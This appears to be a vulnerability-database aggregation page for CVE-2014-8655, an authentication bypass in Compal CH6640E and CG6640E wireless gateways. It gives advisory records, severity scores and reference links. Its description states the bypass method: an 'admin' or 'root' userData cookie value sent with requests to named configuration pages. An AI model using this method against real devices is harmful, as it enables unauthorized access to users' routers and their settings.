        "id": "CNNVD-201411-190"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Compal Broadband Networks of  CH6640E and  CG6640E Wireless Gateway Vulnerabilities that can bypass authentication in some firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-005242"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201411-190"
      }
    ],
    "trust": 0.6
  }
}

GSD-2014-8655

Vulnerability from gsd - Updated: 2023-12-13 01:22

Details

Aliases

CVE-2014-8655

Aliases

CVE-2014-8655

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2014-8655",
    "description": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml.",
    "id": "GSD-2014-8655"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2014-8655"
      ],
      "details": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml.",
      "id": "GSD-2014-8655",
      "modified": "2023-12-13T01:22:49.156271Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2014-8655",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "70762",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/70762"
          },
          {
            "name": "113837",
            "refsource": "OSVDB",
            "url": "http://osvdb.org/show/osvdb/113837"
          },
          {
            "name": "35075",
            "refsource": "EXPLOIT-DB",
            "url": "http://www.exploit-db.com/exploits/35075"
          },
          {
            "name": "cbn-ch6640ecg6640e-info-disc(98331)",
            "refsource": "XF",
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98331"
          },
          {
            "name": "http://packetstormsecurity.com/files/128860/CBN-CH6640E-CG6640E-Wireless-Gateway-XSS-CSRF-DoS-Disclosure.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/128860/CBN-CH6640E-CG6640E-Wireless-Gateway-XSS-CSRF-DoS-Disclosure.html"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:compal_broadband_networks:firmware:ch6640-3.5.11.7-nosh:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:compal_broadband_networks:cg6640e_wireless_gateway:1.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:compal_broadband_networks:ch664oe_wireless_gateway:1.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-8655"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-264"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "70762",
              "refsource": "BID",
              "tags": [],
              "url": "http://www.securityfocus.com/bid/70762"
            },
            {
              "name": "113837",
              "refsource": "OSVDB",
              "tags": [],
              "url": "http://osvdb.org/show/osvdb/113837"
            },
            {
              "name": "http://packetstormsecurity.com/files/128860/CBN-CH6640E-CG6640E-Wireless-Gateway-XSS-CSRF-DoS-Disclosure.html",
              "refsource": "MISC",
              "tags": [
                "Exploit"
              ],
              "url": "http://packetstormsecurity.com/files/128860/CBN-CH6640E-CG6640E-Wireless-Gateway-XSS-CSRF-DoS-Disclosure.html"
            },
            {
              "name": "35075",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit"
              ],
              "url": "http://www.exploit-db.com/exploits/35075"
            },
            {
              "name": "cbn-ch6640ecg6640e-info-disc(98331)",
              "refsource": "XF",
              "tags": [],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98331"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        }
      },
      "lastModifiedDate": "2017-09-08T01:29Z",
      "publishedDate": "2014-11-06T15:55Z"
    }
  }
}

FKIE_CVE-2014-8655

Vulnerability from fkie_nvd - Published: 2014-11-06 15:55 - Updated: 2025-04-12 10:46

Severity ?

Summary

References

URL	Tags
cve@mitre.org	http://osvdb.org/show/osvdb/113837
cve@mitre.org	http://packetstormsecurity.com/files/128860/CBN-CH6640E-CG6640E-Wireless-Gateway-XSS-CSRF-DoS-Disclosure.html	Exploit
cve@mitre.org	http://www.exploit-db.com/exploits/35075	Exploit
cve@mitre.org	http://www.securityfocus.com/bid/70762
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/98331
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/show/osvdb/113837
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/128860/CBN-CH6640E-CG6640E-Wireless-Gateway-XSS-CSRF-DoS-Disclosure.html	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://www.exploit-db.com/exploits/35075	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/70762
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/98331

Impacted products

Vendor	Product	Version
compal_broadband_networks	firmware	ch6640-3.5.11.7-nosh
compal_broadband_networks	cg6640e_wireless_gateway	1.0
compal_broadband_networks	ch664oe_wireless_gateway	1.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:compal_broadband_networks:firmware:ch6640-3.5.11.7-nosh:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E1B5054-F2D6-473E-80D3-5FE5A573350E",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:compal_broadband_networks:cg6640e_wireless_gateway:1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D1249AF1-4F7F-4A9F-9950-DB9B6A162C9D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:compal_broadband_networks:ch664oe_wireless_gateway:1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "985486F0-4DFA-4201-B628-D4E43A4D1582",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml."
    },
    {
      "lang": "es",
      "value": "Compal Broadband Networks CH6640E y CG6640E Wireless Gateway 1.0 con firmware CH6640-3.5.11.7-NOSH permite a atacantes remotos evadir la autenticaci\u00f3n y obtener informaci\u00f3n sensible a trav\u00e9s de un valor de (a) administraci\u00f3n o (b) root en la cookie userData en una solicitud a (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, o (3) CmgwBasicSetup.xml en xml/ o (4) basicDDNS.html, (5) basicLanUsers.html, o (6) rootDesc.xml."
    }
  ],
  "id": "CVE-2014-8655",
  "lastModified": "2025-04-12T10:46:40.837",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-11-06T15:55:10.850",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/show/osvdb/113837"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://packetstormsecurity.com/files/128860/CBN-CH6640E-CG6640E-Wireless-Gateway-XSS-CSRF-DoS-Disclosure.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/35075"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/70762"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98331"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/show/osvdb/113837"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://packetstormsecurity.com/files/128860/CBN-CH6640E-CG6640E-Wireless-Gateway-XSS-CSRF-DoS-Disclosure.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/35075"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/70762"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98331"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-264"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-PGH7-F6PC-3535

Vulnerability from github – Published: 2022-05-17 01:12 – Updated: 2022-05-17 01:12

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2014-8655"
  ],
  "database_specific": {
    "cwe_ids": [],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2014-11-06T15:55:00Z",
    "severity": "MODERATE"
  },
  "details": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml.",
  "id": "GHSA-pgh7-f6pc-3535",
  "modified": "2022-05-17T01:12:57Z",
  "published": "2022-05-17T01:12:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-8655"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98331"
    },
    {
      "type": "WEB",
      "url": "http://osvdb.org/show/osvdb/113837"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/128860/CBN-CH6640E-CG6640E-Wireless-Gateway-XSS-CSRF-DoS-Disclosure.html"
    },
    {
      "type": "WEB",
      "url": "http://www.exploit-db.com/exploits/35075"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/70762"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2014-8655 (GCVE-0-2014-8655)

VAR-201411-0178

DDNS config:

Change wifi pass:

Add static mac address (static assigned dhcp client):

Enable/Disable UPnP:

GSD-2014-8655

FKIE_CVE-2014-8655

GHSA-PGH7-F6PC-3535

Tags

Sightings

Nomenclature